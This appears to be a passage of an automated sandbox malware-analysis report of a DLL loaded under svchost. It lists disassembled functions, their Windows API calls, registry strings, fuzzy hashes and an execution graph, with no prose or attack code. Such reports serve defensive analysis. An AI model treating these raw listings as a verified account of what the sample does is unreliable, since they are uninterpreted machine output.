                                                                                            • Part of subcall function 1000180A: CancelIo.KERNEL32(?,?,10001455,00002256,00000000), ref: 10001838
                                                                                            • Part of subcall function 1000180A: InterlockedExchange.KERNEL32(?,00000000), ref: 10001844
                                                                                            • Part of subcall function 1000180A: closesocket.WS2_32(?), ref: 1000184D
                                                                                            • Part of subcall function 1000180A: SetEvent.KERNEL32(?,?,10001455,00002256,00000000), ref: 10001856
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseHandle$CancelCleanupEventExchangeH_prologInterlockedObjectSingleWaitclosesocketsetsockopt
                                                                                          • String ID:
                                                                                          • API String ID: 1476891362-0
                                                                                          • Opcode ID: 22c76b733420cd5322f8b44b49fa99b01b9ed644fac333f7b406b2753b621805
                                                                                          • Instruction ID: 3d7d7f28339fdf93618245a95348ecc54ac045937f8d7f2223a7296bdd3ad800
                                                                                          • Opcode Fuzzy Hash: 22c76b733420cd5322f8b44b49fa99b01b9ed644fac333f7b406b2753b621805
                                                                                          • Instruction Fuzzy Hash: C801A934812BA1DFE725DB64CA4979EBBF5EF047D0F20465CE0A3525EACBB16A04CB11
                                                                                          Function 1000180A Relevance: 7.5, APIs: 5, Instructions: 28COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • setsockopt.WS2_32(?,0000FFFF,00000080,00000000,00000004), ref: 1000182F
                                                                                          • CancelIo.KERNEL32(?,?,10001455,00002256,00000000), ref: 10001838
                                                                                          • InterlockedExchange.KERNEL32(?,00000000), ref: 10001844
                                                                                          • closesocket.WS2_32(?), ref: 1000184D
                                                                                          • SetEvent.KERNEL32(?,?,10001455,00002256,00000000), ref: 10001856
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                                                                                          • String ID:
                                                                                          • API String ID: 1486965892-0
                                                                                          • Opcode ID: 1871585578dca608de80bf68f21ac6b78937bcf90260c740f92b3d4c82ad3011
                                                                                          • Instruction ID: db2c71347286e861532d4f6efb444a5e96e0316710033133ccac3d22043cdb64
                                                                                          • Opcode Fuzzy Hash: 1871585578dca608de80bf68f21ac6b78937bcf90260c740f92b3d4c82ad3011
                                                                                          • Instruction Fuzzy Hash: 12F05E31000729EFEB209B95CC4EE9A7BB9FF08364F204528F382915F4DBB3A9449B50
                                                                                          Function 100042EE Relevance: 6.0, APIs: 4, Instructions: 34synchronizationCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 10004307
                                                                                          • _beginthreadex.MSVCRT ref: 10004325
                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 10004335
                                                                                          • CloseHandle.KERNEL32(?), ref: 1000433E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseCreateEventHandleObjectSingleWait_beginthreadex
                                                                                          • String ID:
                                                                                          • API String ID: 92035984-0
                                                                                          • Opcode ID: 4f24713aeb18b6c8055081ae489e524b02219a3e0fa4e6869f4180a6eb22546b
                                                                                          • Instruction ID: faf95892778ea6415a1c54bed7ea38c560d5af97f962d2801ede21c28746a2bf
                                                                                          • Opcode Fuzzy Hash: 4f24713aeb18b6c8055081ae489e524b02219a3e0fa4e6869f4180a6eb22546b
                                                                                          • Instruction Fuzzy Hash: 93F097B1900119FFEF019FA8CC498AE7BB9FB08351B504565FD25E2264D7329A209B90
                                                                                          Function 10003629 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 21stringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 10004822: memset.MSVCRT ref: 10004857
                                                                                            • Part of subcall function 10004822: memset.MSVCRT ref: 1000486A
                                                                                            • Part of subcall function 10004822: memset.MSVCRT ref: 10004878
                                                                                            • Part of subcall function 10004822: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,?,00002256,00000144,00000000), ref: 10004885
                                                                                            • Part of subcall function 10004822: GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 1000489D
                                                                                            • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 100048AD
                                                                                            • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 100048BD
                                                                                            • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 100048CA
                                                                                            • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 100048D7
                                                                                            • Part of subcall function 10004822: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00002256,00000144,00000000), ref: 10004A63
                                                                                          • lstrlenA.KERNEL32(00000014,?,?,?,?,100037FD,?,00000014,?), ref: 10003650
                                                                                          • lstrcpyA.KERNEL32(00000014,Error,?,?,?,?,100037FD,?,00000014,?), ref: 10003662
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressProc$memset$Library$FreeLoadlstrcpylstrlen
                                                                                          • String ID: Error$InstallTime
                                                                                          • API String ID: 2132864188-3993312925
                                                                                          • Opcode ID: 05b9f159da249184b1e3b095e130b72a17f690af3a1cf10b62a6d9e74dba2db9
                                                                                          • Instruction ID: e8fad5b45eeb662e546af45f25a3999bf1724c4d36ffe5c36dea95d3d4dec653
                                                                                          • Opcode Fuzzy Hash: 05b9f159da249184b1e3b095e130b72a17f690af3a1cf10b62a6d9e74dba2db9
                                                                                          • Instruction Fuzzy Hash: 9DE0BF31140648B7FF115F51CC46F9D3B5AEB187D6F108054FB08680A4DB7396A09789
                                                                                          Function 100035EA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21stringnetworkCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 10004822: memset.MSVCRT ref: 10004857
                                                                                            • Part of subcall function 10004822: memset.MSVCRT ref: 1000486A
                                                                                            • Part of subcall function 10004822: memset.MSVCRT ref: 10004878
                                                                                            • Part of subcall function 10004822: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,?,00002256,00000144,00000000), ref: 10004885
                                                                                            • Part of subcall function 10004822: GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 1000489D
                                                                                            • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 100048AD
                                                                                            • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 100048BD
                                                                                            • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 100048CA
                                                                                            • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 100048D7
                                                                                            • Part of subcall function 10004822: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00002256,00000144,00000000), ref: 10004A63
                                                                                          • lstrlenA.KERNEL32(?,?,1000377E,?,00000032,?,?,?,00000004), ref: 10003611
                                                                                          • gethostname.WS2_32(?,?), ref: 10003621
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressProc$memset$Library$FreeLoadgethostnamelstrlen
                                                                                          • String ID: Remark
                                                                                          • API String ID: 619171837-3865500943
                                                                                          • Opcode ID: 83dbbab8dfa45e9539ae4d59c493a246dad8b5cf60af1f24285e8dd54035da6b
                                                                                          • Instruction ID: 39b077b3adc2da00c1cb4508d3157ec8a6411d10b118cb0f162994d28e94cfda
                                                                                          • Opcode Fuzzy Hash: 83dbbab8dfa45e9539ae4d59c493a246dad8b5cf60af1f24285e8dd54035da6b
                                                                                          • Instruction Fuzzy Hash: BDE0B635240219BBEF125F91CC46F9E3F2AEB087D1F108014FB18681A5DB739660AB89
                                                                                          Function 100039BA Relevance: 5.1, APIs: 4, Instructions: 68memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • VirtualAlloc.KERNEL32(?,?,00001000,00000004,00000000,?,?), ref: 10003A10
                                                                                          • memset.MSVCRT ref: 10003A1B
                                                                                          • VirtualAlloc.KERNEL32(?,?,00001000,00000004,00000000,?,?), ref: 10003A31
                                                                                          • memcpy.MSVCRT(00000000,?,?), ref: 10003A40
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AllocVirtual$memcpymemset
                                                                                          • String ID:
                                                                                          • API String ID: 2542864682-0
                                                                                          • Opcode ID: a05ca4ebf277b10faf3ccce4336dd2b651ae8b873c4573ed6e3e9fab059df227
                                                                                          • Instruction ID: 4a5287acb012e3640f8314301f41164344c56cf0a301795e67bafcb82fb77477
                                                                                          • Opcode Fuzzy Hash: a05ca4ebf277b10faf3ccce4336dd2b651ae8b873c4573ed6e3e9fab059df227
                                                                                          • Instruction Fuzzy Hash: 82213871A00208AFEB11CF59CC81F9AB7F8FF44344F118459E9809B251D770AA50CB54

                                                                                          Execution Graph

                                                                                          Execution Coverage:12.6%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:19.6%
                                                                                          Total number of Nodes:675
                                                                                          Total number of Limit Nodes:13
                                                                                          execution_graph 2333 dd1e55 2336 dd6483 2333->2336 2339 dd63e0 2336->2339 2340 dd63ec 2339->2340 2341 dd63fd _onexit 2340->2341 2342 dd6413 _lock __dllonexit 2340->2342 2345 dd1e5a 2341->2345 2346 dd647a _unlock 2342->2346 2346->2345 2352 dd53d1 2353 dd5400 2352->2353 2354 dd5414 RoOriginateError 2353->2354 2355 dd5423 2353->2355 2357 dd542e 2354->2357 2358 dd54a1 2355->2358 2363 dd63b2 2358->2363 2360 dd54b6 2361 dd54bc 2360->2361 2367 dd3718 2360->2367 2361->2357 2364 dd63be __EH_prolog3_catch 2363->2364 2365 dd6aca 2 API calls 2364->2365 2366 dd63ca 2365->2366 2366->2360 2370 dd3734 2367->2370 2368 dd375c 2368->2361 2369 dd3755 SetEvent 2369->2368 2370->2368 2370->2369 2371 dd44d0 CoReleaseServerProcess 2372 dd44e2 2371->2372 2373 dd5250 2374 dd525f RoOriginateError 2373->2374 2375 dd5270 2373->2375 2374->2375 2376 dd6850 _except_handler4_common 2396 dd6b41 2397 dd61b0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 2396->2397 2398 dd6b52 2397->2398 2412 dd4540 2415 dd5094 2412->2415 2414 dd4553 2416 dd64a6 2 API calls 2415->2416 2417 dd50bf 2416->2417 2418 dd64a6 2 API calls 2417->2418 2419 dd50d7 2418->2419 2419->2414 2411 dd43c0 RoOriginateError 2399 dd64c0 2400 dd64fd 2399->2400 2402 dd64d2 2399->2402 2401 dd64f7 ?terminate@ 2401->2400 2402->2400 2402->2401 2403 dd3240 2404 dd326d 2403->2404 2405 dd3250 2403->2405 2408 dd31df 2405->2408 2409 dd31f8 GetProcAddress 2408->2409 2410 dd31e8 GetModuleHandleW 2408->2410 2409->2404 2410->2409 2428 dd5ef0 __wgetmainargs 2429 dd68f0 2431 dd68f5 2429->2431 2432 dd5e4f LdrResolveDelayLoadedAPI 2431->2432 2432->2431 2433 dd4c70 2434 dd63b2 2 API calls 2433->2434 2435 dd4c84 2434->2435 2436 dd6b70 2437 dd6b8b 2436->2437 2438 dd6bb0 2436->2438 2437->2438 2439 dd6b90 GetProcessHeap HeapFree 2437->2439 2439->2437 2444 dd24e0 GetModuleHandleW GetProcAddress 2445 dd2503 2444->2445 2447 dd4560 2448 dd4594 2447->2448 2450 dd456f 2447->2450 2449 dd457d CoRevokeClassObject 2449->2450 2450->2448 2450->2449 2451 dd3760 SHSetThreadRef CoCreateInstance SHSetThreadRef 2452 dd6b60 2453 dd6b6e 2452->2453 2454 dd48b7 2452->2454 2462 dd4979 2454->2462 2474 dd4b58 WaitForSingleObjectEx 2454->2474 2457 dd496c 2460 dd2a77 13 API calls 2457->2460 2457->2462 2460->2462 2461 dd46ca 15 API calls 2463 dd4920 2461->2463 2464 dd493f 2463->2464 2465 dd4925 GetLastError 2463->2465 2489 dd4b03 2464->2489 2484 dd2a77 ReleaseMutex 2465->2484 2472 dd495b GetProcessHeap HeapFree 2472->2457 2475 dd4b79 2474->2475 2476 dd4903 2474->2476 2475->2476 2505 dd2a26 2475->2505 2476->2457 2479 dd46ca 2476->2479 2480 dd46d9 GetLastError 2479->2480 2481 dd46f0 2479->2481 2482 dd2a52 13 API calls 2480->2482 2481->2461 2483 dd46e8 SetLastError 2482->2483 2483->2481 2485 dd2a8d 2484->2485 2486 dd2a89 SetLastError 2484->2486 2572 dd2a11 2485->2572 2486->2464 2490 dd4b1a 2489->2490 2491 dd4947 2489->2491 2490->2491 2584 dd2e62 2490->2584 2494 dd49b2 2491->2494 2493 dd4b2f GetProcessHeap HeapFree 2493->2490 2495 dd49bd 2494->2495 2496 dd49c5 2494->2496 2497 dd2a52 13 API calls 2495->2497 2498 dd494e 2496->2498 2499 dd2a52 13 API calls 2496->2499 2497->2496 2498->2472 2500 dd2a52 CloseHandle 2498->2500 2499->2498 2501 dd2a68 2500->2501 2502 dd2a64 2500->2502 2503 dd2a11 12 API calls 2501->2503 2502->2472 2504 dd2a76 2503->2504 2508 dd2916 2505->2508 2511 dd2843 2508->2511 2512 dd2855 2511->2512 2523 dd25b2 2512->2523 2515 dd28c5 2535 dd27d1 2515->2535 2516 dd28f5 2517 dd61b0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 2516->2517 2520 dd2906 2517->2520 2524 dd25eb 2523->2524 2525 dd25e1 2523->2525 2527 dd265b GetCurrentThreadId 2524->2527 2525->2524 2526 dd2916 8 API calls 2525->2526 2526->2524 2529 dd26aa 2527->2529 2528 dd27cb 2529->2528 2530 dd2737 IsDebuggerPresent 2529->2530 2532 dd2728 2529->2532 2530->2532 2531 dd27a0 OutputDebugStringW 2534 dd2747 2531->2534 2532->2531 2532->2534 2539 dd2100 2532->2539 2534->2515 2534->2516 2536 dd27e7 2535->2536 2537 dd27f2 memset 2535->2537 2536->2537 2538 dd2820 2537->2538 2542 dd212c 2539->2542 2566 dd22ca 2539->2566 2540 dd61b0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 2541 dd2307 2540->2541 2541->2531 2543 dd21b4 FormatMessageW 2542->2543 2542->2566 2544 dd220a 2543->2544 2545 dd21f3 2543->2545 2547 dd20aa _vsnwprintf 2544->2547 2568 dd20aa 2545->2568 2548 dd2205 2547->2548 2549 dd2235 GetCurrentThreadId 2548->2549 2550 dd20aa _vsnwprintf 2548->2550 2551 dd20aa _vsnwprintf 2549->2551 2552 dd2230 2550->2552 2553 dd225b 2551->2553 2552->2549 2554 dd20aa _vsnwprintf 2553->2554 2553->2566 2555 dd227f 2554->2555 2556 dd2297 2555->2556 2557 dd20aa _vsnwprintf 2555->2557 2558 dd20aa _vsnwprintf 2556->2558 2561 dd22af 2556->2561 2557->2556 2558->2561 2559 dd22cf 2563 dd22e9 2559->2563 2564 dd22d5 2559->2564 2560 dd22b8 2562 dd20aa _vsnwprintf 2560->2562 2561->2559 2561->2560 2562->2566 2565 dd20aa _vsnwprintf 2563->2565 2567 dd20aa _vsnwprintf 2564->2567 2565->2566 2566->2540 2567->2566 2569 dd20bc 2568->2569 2570 dd20d4 2568->2570 2569->2570 2571 dd201a _vsnwprintf 2569->2571 2570->2548 2571->2570 2575 dd293d 2572->2575 2580 dd251b GetLastError 2575->2580 2578 dd2843 11 API calls 2579 dd2985 2578->2579 2581 dd2548 2580->2581 2582 dd2530 2580->2582 2581->2578 2583 dd2916 11 API calls 2582->2583 2583->2581 2585 dd2e78 2584->2585 2586 dd2ea2 GetProcessHeap HeapFree 2584->2586 2587 dd2e7c GetProcessHeap HeapFree 2585->2587 2586->2493 2587->2587 2588 dd2e9e 2587->2588 2588->2586 2589 dd699d 2590 dd69a2 2589->2590 2593 dd5e4f LdrResolveDelayLoadedAPI 2590->2593 2592 dd69af 2593->2592 2602 dd6915 2603 dd68f5 2602->2603 2603->2602 2605 dd5e4f LdrResolveDelayLoadedAPI 2603->2605 2605->2603 2327 dd6510 SetUnhandledExceptionFilter 2610 dd5490 2612 dd54fa 2610->2612 2611 dd55fb RoOriginateErrorW 2619 dd55f9 2611->2619 2612->2611 2615 dd554c 2612->2615 2613 dd61b0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 2614 dd562b 2613->2614 2616 dd55d2 RoOriginateError 2615->2616 2617 dd55e1 2615->2617 2616->2619 2620 dd33f9 2617->2620 2619->2613 2621 dd341e AcquireSRWLockShared 2620->2621 2623 dd3487 2620->2623 2624 dd3477 2621->2624 2625 dd3441 DecodePointer 2621->2625 2628 dd34c9 AcquireSRWLockExclusive 2623->2628 2634 dd3470 2623->2634 2624->2623 2626 dd347b ReleaseSRWLockShared 2624->2626 2627 dd3461 2625->2627 2626->2623 2629 dd3469 ReleaseSRWLockShared 2627->2629 2627->2634 2630 dd34ee DecodePointer 2628->2630 2631 dd34de EncodePointer 2628->2631 2629->2634 2632 dd3505 2630->2632 2631->2632 2633 dd350e ReleaseSRWLockExclusive 2632->2633 2632->2634 2633->2634 2634->2619 2635 dd4510 CoAddRefServerProcess 2646 dd5e80 2647 dd5e85 2646->2647 2655 dd6598 GetModuleHandleW 2647->2655 2649 dd5e91 __set_app_type __p__fmode __p__commode 2650 dd5ec9 2649->2650 2651 dd5ede 2650->2651 2652 dd5ed2 __setusermatherr 2650->2652 2657 dd67cd _controlfp 2651->2657 2652->2651 2654 dd5ee3 2656 dd65a9 2655->2656 2656->2649 2657->2654 2658 dd5400 2659 dd5414 RoOriginateError 2658->2659 2660 dd5423 2658->2660 2662 dd542e 2659->2662 2661 dd54a1 3 API calls 2660->2661 2661->2662 2823 dd4700 2826 dd445f 2823->2826 2825 dd470d 2827 dd3306 ctype 4 API calls 2826->2827 2828 dd446c 2827->2828 2828->2825 2663 dd3200 2664 dd320d 2663->2664 2665 dd322a 2663->2665 2666 dd31df GetModuleHandleW 2664->2666 2667 dd3217 GetProcAddress 2666->2667 2667->2665 2668 dd3180 2676 dd30bc 2668->2676 2671 dd31ca 2672 dd31a1 2672->2671 2681 dd2f81 2672->2681 2677 dd30df GetCurrentThreadId 2676->2677 2678 dd30f8 2676->2678 2677->2678 2680 dd311f GetCurrentThreadId 2678->2680 2693 dd3004 2678->2693 2680->2671 2680->2672 2682 dd2f98 2681->2682 2686 dd2fdc 2681->2686 2683 dd2faa 2682->2683 2697 dd4751 GetCurrentProcessId 2682->2697 2685 dd2fc7 GetCurrentThreadId 2683->2685 2683->2686 2685->2686 2686->2671 2687 dd2ebd 2686->2687 2688 dd2ed4 2687->2688 2692 dd2ee9 2687->2692 2689 dd2f7a 2688->2689 2690 dd230b 3 API calls 2688->2690 2689->2671 2690->2692 2692->2689 2802 dd2d48 2692->2802 2694 dd30b3 2693->2694 2695 dd3024 2693->2695 2694->2680 2695->2694 2695->2695 2696 dd309f memcpy_s 2695->2696 2696->2694 2698 dd1f86 _vsnwprintf 2697->2698 2699 dd478e CreateMutexExW 2698->2699 2700 dd46ca 15 API calls 2699->2700 2701 dd47b7 2700->2701 2702 dd47bf 2701->2702 2703 dd47cb 2701->2703 2723 dd2553 2702->2723 2704 dd4b58 12 API calls 2703->2704 2706 dd47e1 2704->2706 2726 dd2c6f 2706->2726 2707 dd47c4 2710 dd61b0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 2707->2710 2712 dd488c 2710->2712 2711 dd4815 2714 dd29db 11 API calls 2711->2714 2715 dd4832 2711->2715 2712->2683 2714->2715 2718 dd484a 2715->2718 2719 dd483f 2715->2719 2744 dd49d3 2715->2744 2716 dd29db 11 API calls 2716->2718 2720 dd486a 2718->2720 2721 dd2a77 13 API calls 2718->2721 2719->2716 2719->2718 2720->2707 2722 dd2a52 13 API calls 2720->2722 2721->2720 2722->2707 2724 dd251b 12 API calls 2723->2724 2725 dd2568 2724->2725 2725->2707 2727 dd2cad 2726->2727 2728 dd2cbb OpenSemaphoreW 2727->2728 2729 dd2cef 2728->2729 2730 dd2cd2 GetLastError 2728->2730 2766 dd2b5a WaitForSingleObject 2729->2766 2731 dd2cdd 2730->2731 2732 dd2ceb 2730->2732 2763 dd29fa 2731->2763 2734 dd2d2f 2732->2734 2737 dd2a52 13 API calls 2732->2737 2738 dd61b0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 2734->2738 2737->2734 2740 dd2d42 2738->2740 2739 dd29db 11 API calls 2739->2732 2740->2711 2741 dd29db 2740->2741 2742 dd2916 11 API calls 2741->2742 2743 dd29f6 2742->2743 2743->2711 2786 dd230b GetProcessHeap HeapAlloc 2744->2786 2747 dd4a1c 2750 dd4afd 2747->2750 2789 dd2a9c 2747->2789 2748 dd4a03 2749 dd29db 11 API calls 2748->2749 2751 dd4a17 2749->2751 2751->2719 2754 dd4a60 memset 2756 dd4a52 2754->2756 2755 dd4a43 2757 dd29db 11 API calls 2755->2757 2758 dd4ad4 2756->2758 2759 dd2a52 13 API calls 2756->2759 2757->2756 2760 dd4ade 2758->2760 2761 dd2a52 13 API calls 2758->2761 2759->2758 2760->2751 2762 dd4ae2 GetProcessHeap HeapFree 2760->2762 2761->2760 2762->2751 2781 dd298e 2763->2781 2767 dd2b8b 2766->2767 2779 dd2b78 2766->2779 2768 dd2be4 ReleaseSemaphore 2767->2768 2769 dd2ba7 ReleaseSemaphore 2767->2769 2780 dd2b96 2767->2780 2772 dd2c02 2768->2772 2768->2779 2771 dd2bbf ReleaseSemaphore 2769->2771 2769->2779 2770 dd29fa 12 API calls 2773 dd2b86 2770->2773 2775 dd2bd0 GetLastError 2771->2775 2771->2780 2776 dd2c0e ReleaseSemaphore 2772->2776 2772->2780 2773->2732 2773->2739 2774 dd29db 11 API calls 2774->2773 2775->2773 2775->2780 2777 dd2c1c GetLastError 2776->2777 2776->2780 2778 dd2c29 WaitForSingleObject 2777->2778 2777->2780 2778->2779 2778->2780 2779->2770 2780->2773 2780->2774 2782 dd251b 12 API calls 2781->2782 2783 dd29a9 2782->2783 2784 dd2843 11 API calls 2783->2784 2785 dd29d2 2784->2785 2785->2732 2787 dd2328 GetProcessHeap 2786->2787 2788 dd233f 2786->2788 2787->2788 2788->2747 2788->2748 2790 dd2b54 2789->2790 2791 dd2ac9 2789->2791 2792 dd2afd CreateSemaphoreExW 2791->2792 2793 dd2b19 2792->2793 2794 dd2b23 2792->2794 2795 dd46ca 15 API calls 2793->2795 2796 dd2553 12 API calls 2794->2796 2797 dd2b21 2795->2797 2796->2797 2798 dd2b3d 2797->2798 2799 dd29db 11 API calls 2797->2799 2800 dd61b0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 2798->2800 2799->2798 2801 dd2b50 2800->2801 2801->2754 2801->2755 2803 dd2da3 2802->2803 2804 dd2e16 2803->2804 2805 dd230b 3 API calls 2803->2805 2807 dd2e5c 2804->2807 2815 dd4c0a 2804->2815 2806 dd2df4 2805->2806 2806->2804 2808 dd2dfb GetProcessHeap HeapFree 2806->2808 2807->2689 2808->2804 2811 dd4c0a memcpy_s 2812 dd2e3f 2811->2812 2819 dd4ba0 2812->2819 2816 dd4c1a 2815->2816 2818 dd2e30 2815->2818 2816->2816 2817 dd4c3d memcpy_s 2816->2817 2816->2818 2817->2818 2818->2811 2820 dd4bb3 2819->2820 2822 dd2e4e memset 2819->2822 2821 dd4bdb memcpy_s 2820->2821 2820->2822 2821->2822 2822->2807 2837 dd60ba 2838 dd60ce _exit 2837->2838 2839 dd60d5 2837->2839 2838->2839 2840 dd60de _cexit 2839->2840 2841 dd60e9 2839->2841 2840->2841 2846 dd1db5 2847 dd6483 4 API calls 2846->2847 2848 dd1dba 2847->2848 2849 dd48b7 2850 dd48cf 2849->2850 2851 dd4979 2849->2851 2850->2851 2852 dd4b58 12 API calls 2850->2852 2853 dd4903 2852->2853 2854 dd496c 2853->2854 2855 dd46ca 15 API calls 2853->2855 2854->2851 2857 dd2a77 13 API calls 2854->2857 2856 dd4917 2855->2856 2858 dd46ca 15 API calls 2856->2858 2857->2851 2859 dd4920 2858->2859 2860 dd493f 2859->2860 2861 dd4925 GetLastError 2859->2861 2863 dd4b03 6 API calls 2860->2863 2862 dd2a77 13 API calls 2861->2862 2864 dd4935 SetLastError 2862->2864 2865 dd4947 2863->2865 2864->2860 2866 dd49b2 13 API calls 2865->2866 2867 dd494e 2866->2867 2868 dd495b GetProcessHeap HeapFree 2867->2868 2869 dd2a52 13 API calls 2867->2869 2868->2854 2869->2868 2870 dd1e30 2873 dd53ad InitOnceExecuteOnce 2870->2873 2872 dd1e35 2873->2872 2014 dd5f25 2029 dd67e8 2014->2029 2016 dd5f31 GetStartupInfoW 2017 dd5f4e 2016->2017 2018 dd5f63 2017->2018 2019 dd5f6a Sleep 2017->2019 2020 dd5f82 _amsg_exit 2018->2020 2022 dd5f8c 2018->2022 2019->2017 2020->2022 2021 dd5fce _initterm 2025 dd5fe9 __IsNonwritableInCurrentImage 2021->2025 2022->2021 2023 dd5faf 2022->2023 2022->2025 2024 dd60d5 2024->2023 2026 dd60de _cexit 2024->2026 2025->2023 2025->2024 2028 dd6086 exit 2025->2028 2030 dd4136 HeapSetInformation NtSetInformationProcess 2025->2030 2026->2023 2028->2025 2029->2016 2031 dd416e 2030->2031 2031->2031 2086 dd6953 2031->2086 2033 dd4193 2034 dd41ab 